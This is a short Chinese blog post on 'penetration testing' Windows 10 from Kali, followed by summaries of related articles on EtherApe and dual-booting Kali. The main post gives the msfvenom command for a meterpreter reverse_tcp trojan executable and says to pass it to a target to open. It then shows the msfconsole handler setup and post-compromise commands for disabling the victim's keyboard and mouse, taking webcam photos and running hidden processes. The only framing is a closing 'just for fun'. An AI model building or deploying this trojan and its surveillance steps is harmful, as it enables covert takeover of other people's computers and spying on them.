kali滲透測試win10

2021-08-30 08:56:03 字數 1091 閱讀 8017

通過msfvenom生成木馬

msfvenom -p windows/meterpreter/reverse_tcp lhost=自己位址 lport=埠號 -f exe x>xx.exe
把木馬傳過去,點開就會往自己開放的ip和埠傳送乙個tcp鏈結

在kali中

msfconsole

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 172.16.4.3 #設定本地ip

lhost => 172.16.4.3

msf exploit(multi/handler) > set lport 44444 #設定本地埠

lport => 44444

msf exploit(multi/handler) > exploit

[*] started reverse tcp handler on 172.16.4.3:44444

tcp鏈結以後可以使用以下功能

uictl開關鍵盤/滑鼠

uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/滑鼠

uictl disable mouse #禁用滑鼠

uictl disable keyboard #禁用鍵盤

webcam攝像頭命令

webcam_list #檢視攝像頭

webcam_snap #通過攝像頭拍照

execute執行檔案

execute #在目標機中執行檔案

execute -h -i -f cmd.exe # 建立新程序cmd.exe,-h不可見,-i互動

只列出一部分詳細參見下面鏈結

咳咳。。。。玩玩就好

Kali滲透測試 EtherApe

在對網路資料分析的時候,滲透測試人員往往只關心資料流向以及協議型別,而不關心具體資料報的內容。因為這樣可以快速找到網路的關鍵節點或者重要的協議型別。kali linux提供的etherape可以滿足這個需求。該工具需要使用者使用命令apt get install etherape手動安裝。它支援匯入...

在win10下安裝kali系統小記

對滲透有一點點小的好奇,於是打算安裝了kali linux系統試試。因為本身是雙系統,win10 ubuntu 其實是偽三系統,還有個win7 所以想著跟之前裝ubuntu沒什麼區別。但是問題卻頻頻出現,我的系統是legacy啟動方式,如果有相同的朋友可以參考一下。我安裝的是kali 2016.2版...

win10 安裝 kali 雙系統 遇到的問題

參考 1本人主機 雷神 黑幽靈m506 2主機有 1個 1tb的機械 和乙個固態,記憶體8g,我在 機械裡面 劃了300個g出來 不會操作的話 建議使用軟體,簡單 開機按f11 前面準備的東西都差不多,但遇到了 如下 問題 和 解決方法 軟碟通 ultraiso 製作啟動盤時,在讀取時發生錯誤 解決...